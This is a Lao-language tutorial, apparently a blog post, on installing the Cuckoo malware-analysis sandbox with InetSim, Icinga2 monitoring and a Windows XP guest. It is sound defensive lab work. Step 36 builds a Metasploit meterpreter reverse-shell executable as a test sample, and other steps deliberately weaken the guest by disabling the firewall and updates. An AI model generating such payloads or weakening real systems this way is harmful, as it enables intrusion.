Cuckoo ຖືເປັນເຄື່ອງມືທີ່ຍອດນິຍົມສຳລັບ Malware Analysis ຊຶ່ງເຮັດໃຫ້ທຸ່ນແຮງໃນການເຮັດ Dynamic Analysis ຫລາຍ ລຸດທັງເວລາ ແລະ ຂັ້ນຕອນການເຮັດ ມາເບິ່ງກັນວ່າເວລາການຕິດຕັ້ງຈະເຮັດຢ່າງໃດ
(Post ນີ້ທົດສອບໃນ Ubuntu 16.04 64 bit)
1. ຕິດຕັ້ງ Application ທີ່ຈຳເປັນ
apt-get install python python-sqlalchemy python-bson python-dpkt python-jinja2 python-magic python-pymongo python-gridfs python-libvirt python-bottle python-pefile bridge-utils python-pyrex tcpdump libjpeg8-dev zlib1g-dev libfreetype6-dev liblcms2-dev libwebp-dev tcl8.5-dev tk8.5-dev python-tk swig perl perl-base perl-modules-5.22 libnet-server-perl libnet-dns-perl libipc-shareable-perl libio-socket-ssl-perl -y
2. ຕິດຕັ້ງ lib ໂດຍໃຊ້ python
pip install jinja2 pymongo bottle pefile cybox maec django chardet
3. Set ເລື່ອງການ sniff packet
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump getcap /usr/sbin/tcpdump apt-get install apparmor-utils aa-disable /usr/sbin/tcpdump
wget https://downloads.sourceforge.net/project/ssdeep/ssdeep-2.13/ssdeep-2.13.tar.gz tar xvf ssdeep-2.13.tar.gz cd ssdeep-2.13 ./configure && make && make install git clone https://github.com/kbandla/pydeep cd pydeep python setup.py build python setup.py install apt-get install yara python-yara git clone https://github.com/gdabah/distorm python setup.py build python setup.py install wget http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip unzip volatility_2.6_lin64_standalone.zip cd volatility_2.6_lin64_standalone mv volatility_2.6_lin64_standalone /usr/sbin/volatility apt-get install virtualbox pip install requests==2.7.0 pip install requests==2.13.0
5. ສ້າງ user ສຳລັບ cuckoo ແລະ ຕິດຕັ້ງ cuckoo
adduser cuckoo usermod -G vboxusers cuckoo sudo pip install -U pip setuptools sudo pip install -U cuckoo
6. ສ້າງ iptables ສຳລັບການ monitoring traffic
sudo iptables -t nat -A POSTROUTING -o eth0 -s 192.168.56.0/24 -j MASQUERADE # Default drop. sudo iptables -P FORWARD DROP # Existing connections. sudo iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT # Accept connections from vboxnet to the whole internet. sudo iptables -A FORWARD -s 192.168.56.0/24 -j ACCEPT # Internal traffic. sudo iptables -A FORWARD -s 192.168.56.0/24 -d 192.168.56.0/24 -j ACCEPT # Log stuff that reaches this point (could be noisy). sudo iptables -A FORWARD -j LOG
7. ກຳນົດໃຫ້ສາມາດເຮັດ ip forwarding ໄດ້
echo 1 | sudo tee -a /proc/sys/net/ipv4/ip_forward sudo sysctl -w net.ipv4.ip_forward=1
8. ຕິດຕັ້ງ iptables-persistent ເພື່ອໃຫ້ iptables rule ນັ້ນຖືກໂຫລດເມື່ອທຳການ restart ເຄື່ອງ
sudo apt-get install iptables-persistent
9. ສ້າງ Interface ສຳລັບຫນ້າທີ່ຕ່າງໆ
None Routing Routing ແບບທີ່ບໍ່ໄດ້ໄປໃສຕໍ່ Drop Routing Drop traffic ທັງໝົດທີ່ບໍ່ແມ່ນ cuckoo, ລວມເຖິງ subnet VM net ດ້ວຍ Internet Routing ເຂົ້າເຖິງ internet ໄດ້ປົກກະຕິ (ຮຽກວ່າສາຍທີ່ສົກກະປົກ (Dirty Line) ເພາະວ່າ malware ຈະໃຊ້ network ນີ້ເພື່ອຈະໄປດຶງ payload ທີ່ເຫລືອມາໃຊ້) InetSim Routing Route ທັງໝົດໄປທີ່ InetSim instance ຊຶ່ງຈະມີແຕ່ fake services ຕ່າງໆ ເອົາໄວ້ຫລອກ Malware ທີ່ພະຍາຍາມຕິດຕໍ່ໄປຂ້າງນອກ Tor Routing Routes all traffic through Tor. VPN Routing Routes all traffic through one of perhaps multiple pre-defined VPN endpoints.
10. ກຳນົດໄຟລ໌ / etc/iproute2/rt_tables ເພື່ອໃຫ້ສາມາດໃຊ້ iproute2 ໄດ້ ໂດຍການໃສ່ interface ຂອງເຮົາເຂົ້າໄປໃນນັ້ນ
# # reserved values # 255 local 254 main 253 default 0 unspec # # local # 400 eth0
11. ຕິດຕັ້ງ InetSim
groupadd inetsim echo "deb http://www.inetsim.org/debian/ binary/" >> /etc/apt/sources.list wget -O - http://www.inetsim.org/inetsim-archive-signing-key.asc | apt-key add - aptitude update aptitude install inetsim -y
12. Set InetSim ທັງໝົດເປັນ IP ທີ່ເຮົາຕັ້ງໃນ VBox ຊຶ່ງໃນທີ່ນີ້ເຮົາໃຊ້ເປັນ 192.168.56.1 ດັ່ງນັ້ນໃນ /etc/inetsim/inetsim.conf
service_bind_address 192.168.56.1 ຫາກເຮົາຕ້ອງການ set DNS Query ທັງໝົດໃຫ້ມາຍັງເຄື່ອງ InetSim ຕ້ອງກຳນົດໃຫ້ InetSim ບໍລິການ DNS ດ້ວຍ ໂດຍ set dns_default_ip 192.168.56.1
13. Start cuckoo ເພື່ອໃຫ້ສ້າງ configuration ໃຫ້
cuckoo -d
Image does not exist: https://www.techsuii.com/wp-content/uploads/2017/07/Screen-Shot-2560-07-10-at-10.03.07.png
Configuration ທີ່ຖືກສ້າງຈະມີດັ່ງນີ້
- cuckoo.conf: ສຳລັບ behavior ແລະ analysis options.
- auxiliary.conf: ສຳລັບ enabling ແລະ configuring auxiliary modules.
-
- memory.conf: Volatility configuration.
- processing.conf: ສຳລັບ enabling ແລະ configuring processing modules.
- reporting.conf: ສຳລັບ enabling ແລະ disabling report formats.
- routing.conf: ເປັນສ່ວນກຳນົດ routing ຂອງ Virtual Machine
14. ແກ້ໄຂ routing.conf
vim /home/<username>/.cuckoo/conf/routing.conf
15. ກຳນົດ inetsim ເປັນ
[inetsim] enabled = yes server = 192.168.56.1
16. ຕິດຕັ້ງ Ichinga2 ເພື່ອເອົາໄວ້ monitor Cuckoo
wget -O - http://packages.icinga.org/icinga.key | apt-key add - echo 'deb http://packages.icinga.com/ubuntu icinga-zesty main' > /etc/apt/sources.list.d/icinga.list echo 'deb-src http://packages.icinga.com/ubuntu icinga-zesty main' >> /etc/apt/sources.list.d/icinga.list apt-get update apt-get install icinga2 php-icinga echo 'date.timezone = "Asia/Bangkok"' >> /etc/php/7.0/fpm/php.ini icinga2 feature enable command service icinga2 restart
17. ຕິດຕັ້ງ postgresql ແລະ setup database ໃຫ້
apt-get install postgresql icinga2-ido-pgsql sudo -u postgres psql postgres=# CREATE USER icingaweb WITH PASSWORD 'p@ssw0rd'; postgres=# CREATE DATABASE icingaweb; postgres=# q
18. ສ້າງໄຟລ໌ /etc/icinga2/features-enabled/ido-pgsql.conf ຂຶ້ນມາ ຈາກນັ້ນໃສ່ເນື້ອຫາເປັນ
library "db_ido_pgsql"
object IdoPgsqlConnection "ido-pgsql" {
user = "icinga2",
password = "p@ssw0rd",
host = "localhost",
database = "icinga2"
}
19. ຕິດຕັ້ງ icingaweb2
apt-get install icingaweb2 icingaweb2-common php-icinga php-pdo-pgsql
20. ສ້າງໄຟລ໌ configuration ຂອງ icinga ໃນ nginx ຂຶ້ນມາ (/etc/nginx/sites-available/icinga)
server {
listen 0.0.0.0:80;
server_name icinga2.yourdomain.tld;
location ~ ^/index.php(.*)$ {
fastcgi_pass unix:/run/php/php7.0-fpm.sock;
fastcgi_index index.php;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME /usr/share/icingaweb2/public/index.php;
fastcgi_param ICINGAWEB_CONFIGDIR /etc/icingaweb2;
}
location ~ ^/(.*)? {
allow all;
alias /usr/share/icingaweb2/public;
index index.php;
rewrite ^/$ /dashboard;
try_files $1 $uri $uri/ /index.php$is_args$args;
}
}
21. ນຳໄຟລ໌ default ໃນ site-enabled ອອກ ແລ້ວ link icinga ຈາກ sites-available ເຂົ້າໄປ
ln -s /etc/nginx/sites-available/icinga /etc/nginx/sites-enabled/ cd /etc/nginx/sites-enabled/ rm default /etc/init.d/nginx restart
22. ສ້າງ Token ຂຶ້ນມາໂດຍໃຊ້ຄຳສັ່ງ
icingacli setup token create
23. ເຂົ້າໄປທີ່ http://localhost ແລ້ວໃສ່ Token
Image does not exist: https://www.techsuii.com/wp-content/uploads/2017/07/Screen-Shot-2560-07-10-at-10.55.35.png
Step ‘modules’, click Next Step ‘icinga web 2’, should be all green Step ‘Authentication’, click Next Step ‘Database Resource’, fill in PostgreSQL details
Image does not exist: https://www.techsuii.com/wp-content/uploads/2017/07/Screen-Shot-2560-07-10-at-10.59.23.png
step ‘Authentication Backend’, click Next step ‘Administration’, create an admin account Next on all steps
24. ສ້າງ master node ຮອງຮັບການ monitor node ໃດໆຂອງ icinga2
icinga2 node wizard
root@lab-64:~# icinga2 node wizard
Welcome to the Icinga 2 Setup Wizard!
We'll guide you through all required configuration details.
Please specify if this is a satellite setup ('n' installs a master setup) [Y/n]: n
Starting the Master setup routine...
Please specify the common name (CN) [lab-64]: cuckoomaster
Checking for existing certificates for common name 'cuckoomaster'...
Certificates not yet generated. Running 'api setup' now.
information/cli: Generating new CA.
information/base: Writing private key to '/var/lib/icinga2/ca/ca.key'.
information/base: Writing X509 certificate to '/var/lib/icinga2/ca/ca.crt'.
information/cli: Generating new CSR in '/etc/icinga2/pki/cuckoomaster.csr'.
information/base: Writing private key to '/etc/icinga2/pki/cuckoomaster.key'.
information/base: Writing certificate signing request to '/etc/icinga2/pki/cuckoomaster.csr'.
information/cli: Signing CSR with CA and writing certificate to '/etc/icinga2/pki/cuckoomaster.crt'.
information/pki: Writing certificate to file '/etc/icinga2/pki/cuckoomaster.crt'.
information/cli: Copying CA certificate to '/etc/icinga2/pki/ca.crt'.
Generating master configuration for Icinga 2.
information/cli: Adding new ApiUser 'root' in '/etc/icinga2/conf.d/api-users.conf'.
information/cli: Enabling the 'api' feature.
Enabling feature api. Make sure to restart Icinga 2 for these changes to take effect.
information/cli: Dumping config items to file '/etc/icinga2/zones.conf'.
information/cli: Created backup file '/etc/icinga2/zones.conf.orig'.
Please specify the API bind host/port (optional):
Bind Host []: 127.0.0.1
Bind Port []:
information/cli: Created backup file '/etc/icinga2/features-available/api.conf.orig'.
warning/cli: CN 'cuckoomaster' does not match the default FQDN 'lab-64'. Requires update for NodeName constant in constants.conf!
information/cli: Updating constants.conf.
information/cli: Created backup file '/etc/icinga2/constants.conf.orig'.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
Done.
Now restart your Icinga 2 daemon to finish the installation!
/etc/init.d/icinga2 restart
25. ສ້າງ node ການ monitor ຂອງ icinga2 ສຳລັບ Cuckoo
icinga2 pki ticket --cn 'cuckooicinga2'
root@lab-64:~# icinga2 node wizard
Welcome to the Icinga 2 Setup Wizard!
We'll guide you through all required configuration details.
Please specify if this is a satellite setup ('n' installs a master setup) [Y/n]:
Starting the Node setup routine...
Please specify the common name (CN) [lab-64]: cuckooicinga2
Please specify the master endpoint(s) this node should connect to:
Master Common Name (CN from your master setup): cuckoomaster
Do you want to establish a connection to the master from this node? [Y/n]:
Please fill out the master connection information:
Master endpoint host (Your master's IP address or FQDN): 127.0.0.1
Master endpoint port [5665]:
Add more master endpoints? [y/N]: N
Please specify the master connection for CSR auto-signing (defaults to master endpoint host):
Host [127.0.0.1]:
Port [5665]:
warning/cli: Backup file '/etc/icinga2/pki/cuckooicinga2.key.orig' already exists. Skipping backup.
warning/cli: Backup file '/etc/icinga2/pki/cuckooicinga2.crt.orig' already exists. Skipping backup.
information/base: Writing private key to '/etc/icinga2/pki/cuckooicinga2.key'.
information/base: Writing X509 certificate to '/etc/icinga2/pki/cuckooicinga2.crt'.
information/cli: Fetching public certificate from master (127.0.0.1, 5665):
Certificate information:
Subject: CN = cuckoomaster
Issuer: CN = Icinga CA
Valid From: Jul 10 04:18:02 2017 GMT
Valid Until: Jul 6 04:18:02 2032 GMT
Fingerprint: 78 6B 82 C6 68 77 6E E8 E3 16 DB 64 66 CD AE 92 A2 79 43 A2
Is this information correct? [y/N]: y
information/cli: Received trusted master certificate.
Please specify the request ticket generated on your Icinga 2 master.
(Hint: # icinga2 pki ticket --cn 'cuckooicinga2'):
Please specify the request ticket generated on your Icinga 2 master.
(Hint: # icinga2 pki ticket --cn 'cuckooicinga2'): 809f5b57ff41c02a015ec3cc6652d5694f8e96a0
information/cli: Requesting certificate with ticket '809f5b57ff41c02a015ec3cc6652d5694f8e96a0'.
information/cli: Created backup file '/etc/icinga2/pki/ca.crt.orig'.
warning/cli: Backup file '/etc/icinga2/pki/cuckooicinga2.crt.orig' already exists. Skipping backup.
information/cli: Writing signed certificate to file '/etc/icinga2/pki/cuckooicinga2.crt'.
information/cli: Writing CA certificate to file '/etc/icinga2/pki/ca.crt'.
Please specify the API bind host/port (optional):
Bind Host []:
Bind Port []:
Accept config from master? [y/N]: y
Accept commands from master? [y/N]: y
information/cli: Disabling the Notification feature.
Disabling feature notification. Make sure to restart Icinga 2 for these changes to take effect.
information/cli: Enabling the Apilistener feature.
warning/cli: Feature 'api' already enabled.
warning/cli: Backup file '/etc/icinga2/features-available/api.conf.orig' already exists. Skipping backup.
information/cli: Generating local zones.conf.
information/cli: Dumping config items to file '/etc/icinga2/zones.conf'.
warning/cli: Backup file '/etc/icinga2/zones.conf.orig' already exists. Skipping backup.
warning/cli: CN 'cuckooicinga2' does not match the default FQDN 'lab-64'. Requires update for NodeName constant in constants.conf!
information/cli: Updating constants.conf.
warning/cli: Backup file '/etc/icinga2/constants.conf.orig' already exists. Skipping backup.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
Done.
Now restart your Icinga 2 daemon to finish the installation!
/etc/init.d/icinga2 restart
ເຮົາສາມາດ set ໃຫ້ທຳການແຈ້ງເຕືອນໃດໆໄດ້ໂດຍກຳນົດທີ່ /etc/icinga2/conf.d/users.conf
object User "sysadmin" {
display_name = "System Administrator"
enable_notifications = true
states = [ Warning, Critical ]
types = [ Problem, Recovery ]
email = "[email protected]"
}
template Notification "generic-notification" {
states = [ Warning, Critical, Unknown ]
types = [ Problem, Acknowledgement, Recovery, Custom, FlappingStart,
FlappingEnd, DowntimeStart, DowntimeEnd, DowntimeRemoved ]
}
apply Notification "notify-sysadmin" to Service {
import "generic-notification"
command = "notify-cuckoo"
users = [ "sysadmin" ]
assign where service.name in ["check_cuckoo", "ssh", "ping4"]
}
object NotificationCommand "notify-cuckoo" {
import "plugin-notification-command"
command = [
SysconfDir + "/icinga2/scripts/notify.py"
]
env = {
NOTIFICATIONTYPE = "$notification.type$"
SERVICEDESC = "$service.name$"
HOSTALIAS = "$host.display_name$"
HOSTADDRESS = "$address$"
SERVICESTATE = "$service.state$"
LONGDATETIME = "$icinga.long_date_time$"
SERVICEOUTPUT = "$service.output$"
NOTIFICATIONAUTHORNAME = "$notification.author$"
NOTIFICATIONCOMMENT = "$notification.comment$"
HOSTDISPLAYNAME = "$host.display_name$"
SERVICEDISPLAYNAME = "$service.display_name$"
USEREMAIL = "$user.email$"
}
ຈາກນັ້ນສ້າງໄຟລ໌ / etc/icinga2/scripts/notify.py ໃຫ້ທຳການແຈ້ງເຕືອນດ້ວຍສິ່ງທີ່ເຮົາຕ້ອງການ
26. ສ້າງ Virtual Machine ເພື່ອສຳລັບການເຮັດ Sandbox
VBoxManage createvm --name "WindowsXP" --register # ກຳນົດ memory ແລະ boot ຜ່ານ dvd VBoxManage modifyvm "WindowsXP" --memory 1024 --acpi off --boot1 dvd # ກຳນົດ network interface ເປັນ hostonly VBoxManage modifyvm "WindowsXP" --nic1 hostonly --hostonlyadapter1 vboxnet0 # ກຳນົດ type ຂອງ VM ເປັນ WindowsXP VBoxManage modifyvm "WindowsXP" --ostype windowsxp # ສ້າງ virtual hdd VBoxManage createhd --filename /root/VirtualBox VMs/WindowsXP/WindowsXP.vdi --size 20480 # Add Virtual HDD ໄປຍັງ Windows XP VM VBoxManage storagectl "WindowsXP" --name "IDE Controller" --add ide VBoxManage storageattach "WindowsXP" --storagectl "IDE Controller" --port 0 --device 0 --type hdd --medium /root/VirtualBox VMs/WindowsXP/WindowsXP.vdi # Add ISO ໄປຍັງ Windows XP VM VBoxManage storageattach "WindowsXP" --storagectl "IDE Controller" --port 1 --device 0 --type dvddrive --medium /path/of/windows/xp # ເປີດ port remote 3389 VBoxManage modifyvm "WindowsXP" --vrde on # Start VM VBoxHeadless --startvm "WindowsXP"
27. Remote ເຂົ້າໄປເພື່ອທຳການ setup Windows ຫລື ຈະເປີດ Virtualbox ເພື່ອກທຳການຕິດຕັ້ງໃນສ່ວນທີ່ເຫລືອ
28. ປ່ຽນ mode ຂອງ Virtual Machine ໃຫ້ເປັນ NAT ເພື່ອຕິດຕັ້ງ client ຂອງ Cuckoo
VBoxManage modifyvm "WindowsXP" --nic1 nat
29. ເພື່ອໃຫ້ເໝາະກັບທັງ environment ສຳລັບການ monitor ໂດຍ Cuckoo ແລະ ການ set ໃຫ້ງ່າຍຕໍ່ການແຮັກ ເຮັດດັ່ງນີ້
• ທຳການຕິດຕັ້ງ Python ໃນ Windows XP
• ປິດການໃຊ້ງານ Windows Firewall
• ປິດການໃຊ້ງານ Autoupdate
• ລົງ Adobe Reader version 9 ແລະ Microsoft Office
30. ຕິດຕັ້ງ agent ຂອງ Cuckoo ໂດຍ copy file ຈາກ /home/
31. ແກ້ໄຂ Registry startup ເພື່ອໃຫ້ agent ເປີດທຸກໆເທື່ອທີ່ເປີດເຄື່ອງ
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /t Reg_Sz /v CuckooAgent /d "C:WindowsSystem32agent.py"
32. ເອົາ nat ອອກແລ້ວກທຳການ down Virtual Machine ເພື່ອເຮັດ snapshot
VBoxManage modifyvm "WindowsXP" --nic2 none VBoxManage snapshot "WindowsXP" take "After preparing"
33. Configure Cuckoo
/home/<username>/.cuckoo/conf/virtualbox.conf
[virtualbox] mode = headless path = /usr/bin/VBoxManage interface = vboxnet0 machines = WindowsXP [WindowsXP] label = WindowsXP platform = windows ip = 192.168.56.101
34. ກັບມາເປີດ WindowsXP
VBoxHeadless --startvm "WindowsXP"
35. Run cuckoo
cuckoo rooter /tmp/cuckoo-rooter cuckoo -d
Image does not exist: https://www.techsuii.com/wp-content/uploads/2017/07/Screen-Shot-2560-07-10-at-14.11.24.png
36. ສ້າງໄຟລ໌ Malicious file ດ້ວຍ Metasploit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=4444 -f exe -o malware.exe
37. Submit file
cuckoo submit malware.exe
ເຮົາສາມາດ submit ໄດ້ຫລາຍແບບ
# Submit URL cuckoo submit --url http://www.example.com # Submit file ໂດຍກຳນົດ priority $ cuckoo submit --priority 5 /path/to/binary # Submit file ໂດຍກຳນົດ timeout ຂອງການ analysis $ cuckoo submit --timeout 60 /path/to/binary # Submit file ໂດຍກຳນົດ parameter ຂອງໄຟລ໌ $ cuckoo submit --package exe --options arguments=--dosomething /path/to/binary.exe # Submit file ໂດຍກຳນົດ Virtual Machine ທີ່ໃຊ້ $ cuckoo submit --machine cuckoo1 /path/to/binary # Submit file ໂດຍກຳນົດ Virtual Machine OS ທີ່ໃຊ້ $ cuckoo submit --platform windows /path/to/binary # Submit file ພ້ອມໃຫ້ເຮັດ memory dump $ cuckoo submit --memory /path/to/binary
38. Setup cuckoo web server
apt-get install mongodb
ກຳນົດໃນ ~/.cuckoo/conf/reporting.conf
[mongodb] enabled = yes
Run web server (ຢ່າລືມວ່າຖ້າຈະ submit file cuckoo ຕ້ອງເປີດຢູ່ດ້ວຍ)
cuckoo web runserver
Source:
https://www.proteansec.com/linux/installing-using-cuckoo-malware-analysis-sandbox/
https://github.com/spender-sandbox/cuckoo-modified
https://precisionsec.com/installing-and-configuring-inetsim-on-ubuntu/
https://infosecspeakeasy.org/t/howto-build-a-cuckoo-sandbox/27
https://jbremer.org/vmcloak3/
https://sector.ca/wp-content/uploads/presentations16/simmons%20Open%20Source%20Malware%20Lab%20SecTor.pdf
https://cuckoo.sh/docs/
https://www.techsuii.com/2017/07/10/how-to-install-cuckoo-automated-malware-analysis/
